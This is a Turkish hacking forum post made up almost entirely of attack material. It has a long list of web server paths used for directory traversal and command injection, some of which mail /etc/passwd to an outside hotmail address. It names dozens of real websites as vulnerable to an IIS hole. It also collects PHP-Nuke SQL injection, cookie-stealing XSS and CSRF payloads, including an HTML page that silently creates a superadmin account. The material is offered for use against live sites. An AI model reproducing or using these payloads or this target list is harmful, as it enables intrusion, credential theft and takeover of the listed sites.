/./
/..
/../..
/..../
/....../
/....../
/......../
/~
/+/
/+./
/++/
/++./
/%00/
:2301
/2600-cgi/ezmlm-cgi
/%2E%2E
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/hosts
/%2E%2E/%2E%2E/Program%20Files/AnalogX/SimpleServer/www/server.log
:3000/../../hosts
:3128/../../../../
:3128/../../../conf/Eserv.ini
:444/..........autoexec.bat
:5000/
:800/../..
:8000/cgi/wja?page=wja
:8000/servlet/com.livesoftware.jrun.plugins.jsp.JSP/../../../tst.txt
:8000/servlet/com.livesoftware.jrun.plugins.ssi.SSIFilter/../../test.jsp
:8000/servlet/jsp/../../tst.txt
:8000/servlet/ssifilter/../../test.jsp
:8002/Newuser?Image=../../database/rbsserv.mdb
:8003/Display
:800/C:/
:8010/
:8010//
:8010/..../
:8010/c://
:8010/d://
:8010/Guide/../../../../../../../../../../../../../../../etc/shadow
:8010/Guide/../../../../../../../../../../../var/CommuniGate/Accounts/postmaster.macnt/account.settings
:801/../../../../../../../../etc/hosts
:8080/anything.jsp
:8080/../../../conf/Eserv.ini
:8080/examples/jsp/snp/anything.snp
:8080/tea/dynamic/system/teaservlet/Admin?admin=true
:8088
:80/../../../autoexec.bat
:8100//WEB-INF/
:8100//WEB-INF/webapp.properties
:8100//WEB-INF/web.xml
:8383
:8888/
:8888/ab2/@Ab2Admin
:8888/cgi-bin/admin/admin
:8888/cgi-bin/admin/admin?command=add_user&uid=percebe&password=perceb e&re_password=percebe
:8987/sawmill?rfcf+%22/etc/passwd%22+spbn+1,1,21,1,1,1,1,1,1,1,1,1+3
:9000/cgi-bin/query%3f
:901
:9090
:9090/board.html
:9090/examples/applications/bboard/bboard_frames.html
:9090/servlet/com.sun.server.http.pagecompile.jsp92.JspServlet/board.html
:9998/
/.access
/achg.htr
/active.log
/ad.cgi?file=../../../../../../../../etc/hosts
/admin/
/admin.cgi
/Admin_files/order.log
/admin.htm
/admin.html
/admin/includes/
/admin.php3
/admin.php3?admin=whatever
/admin.pl
/admin-serv/config/admpw
/admin.shtml
/admisapi/fpadmin.htm
/ads/admin.cgi
/ads/adpassword.txt
/adsamples/config/site.csc
/AdvWorks/equipment/catalog_type.asp
/advworks/equipment/catalog_type.asp
/aexp2.htr
/aexp3.htr
/aexp4b.htr
/aglimpse
/Album/?mode=album&album=..%2F..%2F..%2F..%2F..%2F..%2F.. %2F..%2Fetc&dispsize=640&start=0
/aliredir.exe
/....../ all
/../../../../ all
/amadmin.pl
/AnalogX
/anot3.htr
/AnyForm2
/anything.jsp
/architext_query.pl
/args.bat
/ASPSamp/AdvWorks/equipment/catalog_type.asp
/AT-admin.cgi
/auctionweaver.pl
/_AuthChangeUrl
/_AuthChangeUrl?
/authors.pwd
/....../autoexec.bat
/........./autoexec.bat
/......autoexec.bat
/aux
/bash
/.bash_history
/bb-dnbd/bb-hist.sh
/bboard_frames.html
/beaninfo.cfm
/bigconf.cgi
/~bin
/~bin/
/bin
/bin/
/bin/common/user_update_admin.pl
/bin/common/user_update_passwd.pl?user_id=V&firstname=FI&lastn ame=LA&course_id=SID&password1=NEWPWD&password2=NE WPWD
/bizdb1-search.cgi
/blabla.ida
/blabla.idc
/blabla.idq
/blabla.idw
/bnbform
/bnbform.cgi
/../../../../../../../boot.ini
/../../boot.ini
/build.cgi
/campas
/carbo.dll
/cart32.exe
/cart.cgi
/catalog.nsf
/catalog.nsf/
/ccbill/
/ccbill/secure/ccbill.log
/cd/../config/html/cnf_gi.htm
/cfappman/index.cfm
/cfdocs/cfmlsyntaxcheck.cfm
/cfdocs/exampleapp/docs/sourcewindow.cfm
/cfdocs/exampleapp/docs/sourcewindow.cfm?Template=
/cfdocs/exampleapp/email/application.cfm
/cfdocs/exampleapp/email/getfile.cfm
/cfdocs/exampleapp/email/getfile.cfm?filename=c: oot.ini
/cfdocs/exampleapp/email/getfile.cfm?filename=c: oot.ini
/cfdocs/exampleapp/publish/admin/addcontent.cfm
/cfdocs/exampleapp/publish/admin/addcontent.cfm
/cfdocs/exampleapp/publish/admin/application.cfm
/cfdocs/examples/cvbeans/beaninfo.cfm
/cfdocs/examples/CVLibrary/GetFile.CFM?FT=Text&FST=Plain&FilePath=C: oot.ini
/cfdocs/examples/httpclient/mainframeset.cfm
/cfdocs/examples/parks/detail.cfm
/cfdocs/expelval/displayopenedfile.cfm
/cfdocs/expelval/exprcalc.cfm
/cfdocs/expelval/openfile.cfm
/cfdocs/expelval/sendmail.cfm
/cfdocs/expelvel/openfile.cfm
/cfdocs/expeval/displayopenedfile.cfm
/cfdocs/expeval/eval.cfm
/cfdocs/expeval/exprcalc.cfm
/cfdocs/expeval/openfile.cfm
/cfdocs/expeval/sendmail.cfm
/cfdocs/expressions.cfm
/cfdocs/MOLE.CFM
/cfdocs/root.cfm
/cfdocs/snippets/evaluate.cfm
/cfdocs/snippets/fileexist.cfm
/cfdocs/snippets/fileexists.cfm
/cfdocs/snippets/gettempdirectory.cfm
/cfdocs/snippets/setlocale.cfm
/cfdocs/snippets/viewexample.cfm
/cfdocs/snippets/viewexample.cfm?Tagname=
/cfdocs/TOXIC.CFM
/cfdocs/zero.cfm
/CFIDE/Administrator/startstop.html
/cfide/Administrator/startstop.html
/cfmlsyntaxcheck.cfm
/cfusion/cfapps/forums/data/forums.mdb
/cfusion/cfapps/forums/forums_.mdb
/cfusion/cfapps/security/data/realm.mdb
/cfusion/cfapps/security/realm_.mdb
/cfusion/database/cfexamples.mdb
/cfusion/database/cfsnippets.mdb
/cfusion/database/cypress.mdb
/cfusion/database/smpolicy.mdb
/cgi
/cgi/
/cgi-bin
/cgi-bin/
/cgibin
/cgibin/
/cgi-bin/abuse.man?file=&domain=&script=
/cgi-bin/ad.cgi?file=../../../../../../../../etc/hosts
/cgi-bin/add_ftp.cgi
/cgi-bin/admin.cgi
/cgi-bin/Admin_files/order.log
/cgi-bin/adp
/cgi-bin/adpassword.txt
/cgi-bin/ads.cgi
/cgi-bin/ads.setup
/cgi-bin/af.cgi
/cgi-bin/aglimpse
/cgi-bin/alibaba.pl
/cgi-bin/alibaba.pl|dir
/cgi-bin/alibaba.pl|dir
/cgi-bin/aliredir.exe
/cgi-bin/allmanage/adp
/cgi-bin/allmanage.cgi
/cgi-bin/allmanage/k
/cgi-bin/allmanage.pl
/cgi-bin/allmanage/settings.cfg
/cgi-bin/allmanageup.pl
/cgi-bin/allmanage/userfile.dat
/cgibin/amadmin.pl?setpasswd
/cgi-bin/AnyBoard.cgi
/cgi-bin/anyboard.cgi
/cgi-bin/AnyForm
/cgi-bin/AnyForm2
/cgi-bin/archie
/cgi-bin/architext_query.cgi
/cgi-bin/architext_query.pl
/cgi-bin/ash
/cgi-bin/AT-admin.cgi
/cgi-bin/AT-generate.cgi
/cgi-bin/authorize/dbmfiles/users
/cgi-bin/awl/auctionweaver.pl
/cgi-bin/awl/auctionweaver.pl?flag1=1&catdir=................&f romfile=Boot.ini
/cgi-bin/ax-admin.cgi
/cgi-bin/ax.cgi
/cgi-bin/axs.cgi
/cgi-bin/bash
/cgi-bin/bb-ack.sh
/cgi-bin/bb-dnbd
/cgi-bin/bb-histlog.sh
/cgi-bin/bb-hist.sh
/cgi-bin/bb-hist.sh?HISTFILE=../../../../../../etc/hosts
/cgi-bin/bb-hist.sh?HISTFILE=/home/*
/cgi-bin/bb-hostsvc.sh
/cgi-bin/bb-hostsvc.sh?HOSTSVC=/../../../../../../../../etc/hosts
/cgi-bin/bb-replog.sh
/cgi-bin/bb-rep.sh
/cgi-bin/bigconf.cgi
/cgi-bin/bigconf.cgi all
/cgi-bin/bizdb1-search.cgi
/cgi-bin/bizdb1-search.cgi?template=bizdb-summary&dbname=;ls|mail%20riotnation@hotmail.com|& f6=^a.*&action=searchdbdisplay
/cgi-bin/blabla?%0a/bin/cat%20/etc/passwd
/cgi-bin/bnbform
/cgi-bin/bnbform.cgi
/cgi-bin/bnbform.pl
/cgi-bin/build.cgi
/cgi-bin/cached_feed.cgi?../../../.+/etc/hosts
/cgi-bin/cachemgr.cgi
/cgi-bin/calendar
/cgi-bin/calender_admin.pl
/cgi-bin/calender.pl
/cgi-bin/campas
/cgi-bin/campas?%0acat%0a/etc/passwd%0a
/cgi-bin/carbo.dll
/cgi-bin/cart32.exe/expdate
/cgi-bin/cart.pl
/cgi-bin/cat
/cgi-bin/cgiemail/uargg.txt
/cgi-bin/cgiforum.cgi?thesection=../../../../../../etc/hosts%00
/cgi-bin/cgiforum.pl?thesection=../../../../../../etc/hosts%00
/cgi-bin/cgi-lib.pl
/cgi-bin/CGImail.exe
/cgi-bin/cgimail.exe
/cgi-bin/Cgitest.exe
/cgi-bin/cgitest.exe
/cgi-bin/cgiwrap
/cgi-bin/cgiwrap
/cgi-bin/classified.cgi
/cgi-bin/classifieds
/cgi-bin/classifieds.cgi
/cgi-bin/clickresponder.pl
/cgi-bin/cmd.exe
/cgi-bin/.cobalt/siteUserMod.cgi
/cgi-bin/.cobalt/siteUserMod/siteUserMod.cgi
/cgi-bin/commander.pl
/cgi-bin/cookmail
/cgi-bin/cookmail/cookmail
/cgi-bin/cookmail/cookmail.exe
/cgi-bin/core
/cgi-bin/Count.cgi
/cgi-bin/count.cgi
/cgi-bin/counterbanner
/cgi-bin/counterbanner-ord
/cgi-bin/counterfiglet
/cgi-bin/counterfiglet/nc/f=;echo;w;uname%20-a;id
/cgi-bin/counterfiglet-ord
/cgi-bin/counter-ord
/cgi-bin/cpmdaemon.cgi
/cgi-bin/csh
/cgi-bin/cvsweb.cgi
/cgi-bin/data/nicks
/cgi-bin/date
/cgi-bin/day5datacopier.cgi
/cgi-bin/day5datanotifier.cgi
/cgi-bin/day5notifier
/cgi-bin/db2www/library/document.d2w/report?uid=UNKNOWN&pwd=&search_type=SIMPLE&r_host= &last_page=db2www0022.html&fn=db2www.html
/cgi-bin/dbman/db.cgi
/cgi-bin/dbmlparser.exe
/cgi-bin/dcforum/install_help.cgi
/cgi-bin/dcguest.cgi
/cgi-bin/dcguest/dcguest.cgi
/cgi-bin/dfire.cgi
/cgi-bin/dig.cgi
/cgi-bin/disk2server.cgi
/cgi-bin/dnewsweb
/cgi-bin/donothing
/cgi-bin/download.cgi
/cgi-bin/dumpenv
/cgi-bin/dumpenv.pl
/cgi-bin/echo
/cgi-bin/echo.bat
/cgi-bin/edit.pl
/cgi-bin/edit.pl
/cgi-bin/environ.cgi
/cgi-bin/environ.pl
/cgi-bin/everythingform.cgi?config=../../../../../../../../bin/ping&Name=xx&e-mail=riotnation@hotmail.com
/cgi-bin/ews
/cgi-bin/excite
/cgi-bin/ezmlm-cgi
/cgi-bin/faxsurvey
/cgi-bin/faxsurvey?/bin/ls%20-a
/cgi-bin/.fhp
/cgi-bin/fi
/cgi-bin/fi?/etc/passwd
/cgi-bin/filemail
/cgi-bin/filemail.cgi
/cgi-bin/filemail.pl
/cgi-bin/files.pl
/cgi-bin/finger
/cgi-bin/finger.cgi
/cgi-bin/finger.cgi?action=archives&cmd=specific&&filename= 99.10.28.15.23.username.|/bin/ls|
/cgi-bin/finger?@localhost
/cgi-bin/finger.pl
/cgi-bin/finger?tiedotus@uta.fi%3B%2Fbin%2Fmail+riotnation@ hotmail.com+%3C+etc%2Fpasswd
/cgi-bin/flexform
/cgi-bin/flexform.cgi
/cgi-bin/foo.cmd?xxx&dir
/cgi-bin/FormHandler.cgi
/cgi-bin/formhandler.cgi
/cgi-bin/FormMail.pl
/cgi-bin/formmail.pl
/cgi-bin/formprocessor.asp?MailTo=riotnation@hotmail.com&Ma ilFrom=tst@no.net&Message=tst&MailTemplate1=/cgi-bin/formprocessor.asp
/cgi-bin/formto.pl
/cgi-bin/fortune
/cgi-bin/forum-admin.pl
/cgi-bin/forumdisplay.cgi
/cgi-bin/forum.pl
/cgi-bin/fpcount.exe
/cgi-bin/fpexplore.exe
/cgi-bin/fpexplorer.exe
/cgi-bin/ftpdiag.cgi
/cgi-bin/ftp/ftp.pl?dir=../../../../../../etc
/cgi-bin/futureforum.cgi
/cgi-bin/gbook.cgi?_MAILTO=xx;ls
/cgi-bin/get16.exe
/cgi-bin/get32.exe
/cgi-bin/get32.exe|dir
/cgi-bin/getdoc.cgi
/cgi-bin/gH.cgi
/cgi-bin/glimpse
/cgi-bin/guestadd.pl
/cgi-bin/guestbook.cgi
/cgi-bin/guestbook.pl
/cgi-bin/GW5
/cgi-bin/GW5/GWWEB.EXE
/cgi-bin/GW5/GWWEB.EXE?HELP=bad-request
/cgi-bin/GW5/GWWEB.EXE?HELP=../../../../../index
/cgi-bin/GWWEB.EXE
/cgi-bin/handler
/cgi-bin/handler.cgi
/cgi-bin/hello.bat
/cgibin/htgrep/file=index.html&hdr=/etc/hosts
/cgi-bin/htimage.exe
/cgi-bin/htmldocs
/cgi-bin/html_page?TEMPLATE=main
__________________
ISS AÇIKLARI:
İşte Arkadaşlar Sizlere ISS Açığı Olan Siteler...
işinize Yarayacağından Eminim...!Exploit: %WINDIR%\EXPLORER.EXE ,::{20D04FE0-3AEA-1069-A2D8-08002B30309D}\::{BDEADF00-C265-11d0-BCED-00A0C90AB50F
http://www.htdraw.com/
http://www.powercool.cn/
http://www.jointtrust.org/
http://termcompass.com/
http://industrialrubbertech.com/-
http://www.pkcomp.com/
http://smartcache.net/
http://bandolog.tosembanda.com/
http://www.euroklik.nl/
http://bandolog.tosembanda.com/
http://www.languangav.com/
http://doitrightautoca.com/
http://hongsystem.com/
http://www.aecu.coop/
http://www.htdraw.com/
http://www.powercool.cn/
http://www.solgallery.com/
http://sorwen.com/
http://fairpricesystems.com/
http://gnome-ink.com/
http://hotel-eldorado.net/
http://betterdemocracyforindia.org/
http://creationsinvinyl.com/
http://hariconstruction.net/
http://vinnyandlauren.com/
http://jaguarcasting.com/
http://townandcountrychimney.com/
http://toddandmegan.com/
http://www.jointtrust.org/
http://crypticalizer.com/
http://famfay.com/
http://northwestinventory.com/
http://gbccomlife.com/
http://bochi-rice.com/
http://newtoncandlecompany.com/
http://accuformusa.com/
http://buildingfinancialmodels.net/
http://holysepulchre.net/
http://getonlinescriptsrx.com/
http://gowinconsulting.com/
http://termcompass.com/
http://industrialrubbertech.com/
http://www.501c.com/
http://www.pkcomp.com/
http://heplock.com/
http://cyber-sleuth.net/
http://dave-buchanan.com/
http://fareasternlibrary.org/
http://smartcache.net/
http://comagirlmusic.com/
http://qualitypowerandlighting.com/
http://shorelineblower.com/
http://babzinga.com/
http://go-zoneact.com/
http://mycomputerguyboston.com/
http://j5l.org/
http://morbiran.com/
http://capselkhart.org/
http://standardpack.net/
http://paulstelmaszyk.com/
http://www.axia.no/
http://www.synway.cn/
http://bandolog.tosembanda.com/
--------------------------------------------------------------------------------
Bazı web site açıkları:
Çok basit bir sistem içinde birçok sql injection ve cross-site scripting açıkları var.
/antiboard.php?thread_id=1%20UNION%20ALL%20select%2 0field%20from%20whatever--&mode=threaded&sort_order=
/antiboard.php?range=all&mode=threaded&thread_id=1&reply=1&parent_id=1%20UNION%20ALL%20select%20field%20from% 20whatever--
/antiboard.php?range=all&thread_id=1%20UNION%20ALL%20select%20field%20from% 20whatever--&sort_order=ASC&mode=threaded
/antiboard.php?thread_id=1&parent_id=1%20UNION%20ALL%20select%20field%20from% 20whatever--&mode=nested&reply=1
XSS attack : http://../antiboard.php?thread_id=1&mode=threaded&range=&feedback=< script>alert(document.cookie);</script>
SQL Injection açığı
http://www.siteadı.com/modules.php?...xLG51b GwvKjox
------------------------------------------------
SQL Injection açığı 2
http://www.siteadı.com/modules.php?...0nu ke_authors
-----------------------------------------------
SQL Injection açığı 3
http://www.siteadı.com/modules.php?...%20nuk e_users
-------------------------------------------------
SQL Injection açığı 4
http://www.siteadı.com/modules.php?...OM%20nuke_users
Bu yöntem çok eski bir yöntem ama verdiğim açıklar 2004 yılına uygundur bazı siteler için.
Kod:
http://www.siteninadı.com/phpnukeyo...=f00&score=9999
Kod:
http://www.siteninadı.com/phpnuke yolu/modules.php?name=Reviews&rop=savecomment&id=1&uname=f00bar&score=999999999999999999999999
sistemden cookie çalma bu yolla admin gibi login olabilirsiniz yada md5 hash ini crackliyebilirsiniz
Kod:
http://www.siteninadı.com/phpnukeyolu/modules.php?name=Reviews&rop=postcomment&id='&title=a
bu kod çalışmazsa geri tuşuna basın bidaha ileri tuşuna basın karşınıza admin id si ile md5 hash i gelicektir
admin.php yoluna ulaşmak
Kod:
http://www.siteninadı.com/phpnukeyo...php?op=FaqCatGo
http://www.siteninadı.com/phpnukeyo...n.php/index.php
http://www.siteninadı.com/phpnukeyo...s.php/admin.php
bu tehlikeli açıklardan biridir phpnuke portalına belirlediğinz dosyalar eklenir adam girdiğinde o dosya yada kod bilgisayarınıza iner oto çalıştırılabilir
Kod:
http://www.siteninadı.com/phpnukeyo...iniz.com/dizin/
http://www.siteninadı.com/phpnukeyo...h=//saldırganın ip si/bilgisayardaki klasörün adı/
cross site scripting le önemli bilgilere ulaşmak cookie hash vs.vs
Kod:
http://wwwsiteninadı.com/nukeyolu/m...e=thread&order=[xss
code here]&thold=0
http://www.siteninadı.com/nukeyolu/...d&order=&thold=[xss
code here]
http://www.siteninadı.com/nukeyolu/index.php?foo=bar%20union%20select%20**********alert(document.cookie);</script>
http://www.siteninadı.com/nukeyolu/...d=1&show=foobar
modules.php yardımıyla siteden bilgi çalma yönetim paneline login vs.vs
Kod:
http://www.siteninadı.com/nukeyolu/...HERE/**/radmins
uper=1/**/LIMIT/**/1/*
cookie ayıklama kodundaki hatadan kaynaklanaan sitede herhangi bir script çalıştırılması yada istenilen kişinin cookie aracılıyla hash inin bulunması
Kod:
http://siteninadı.com/nukeyolu/inde...pcHQ%2bZm9vYmFy
sql injection açığı
database modifiye edilmeye olanak verir admin eklenebilir ve önemli bilgilere ulaşılabilir hash özel mesja yoluyla alınır
Kod:
http://www.siteninadı.com/nukeyolu/...xLG51b GwvKjox
admin oluşturma
Kod:
http://www.siteninadı.com/nukeyolu/...0VMRUNUIDEvKjox
kullanıcı adı dropby23 şifre 12345 olur
image tagların arasına eklenicek kodla admin eklenmesi [.img]kod[./img] gibi
Kod:
http://www.example.com/admin.php?op...d_radminsuper=1
kullanııc adı dropby23 şifre 12345 olur
img taglarla belirlenmiş kod admin tarafından okunduğunda god admin olursunuz ve silinemezsiniz
search engine açığı md5 e ulaşmak
devamı extradan
Kod:
http://www.siteninadı.com/nukeyolu/search?q=Maty+Scripts%27UNION SELECT pwd from nuke_authors where name%3d%27God%27 AND IF(mid(pwd,1,1)%3d3,benchmark(150000,md5(1337)),1) /*"
error.php açığı devamlı hata vermesini sağlar sitenin
[code]http://www.siteninadı.com/phpyolu/error.php?newlang=dropby23
yukardaki kodla etkilenmiş siteyi aşağıdaki kodla bi index.hrm hazırlayın ve sadece ona tıklamanız yeterli adminsiniz
Kod:
<HTML>
<HEAD><TITLE>Error Manager sploit</TITLE>
</HEAD>
<BODY bgcolor="#000000" text="#FFFFFF">
<br><br><br>
<center>
<FORM action="http://www.sitebibadı.com/error.php" method="POST">
<input type="hidden" name="error" value="<img width='0' height='0' border='0'
src='http://www.victim.com/admin.php?op=AddAuthor&add_aid=dropby23&add_name=God&add_pwd=12345&add_email=kala@hot.ee&add_radminsuper=1'></img>404">
<input type="submit" value="Attack">
</FORM>
hata sayfası olarak bu kodu hazırlayın inde.htm ve adminin görmesini sağlayın ve adminsiniz
kullanıcı adı dropby23 şifre 12345
</center>
<br><br><br>
</BODY>
</HTML>
Kolay gelsin
--------------------------------------------------------------------------------
İRTİBAT:anadoluteam-byalkotik@hotmail.com |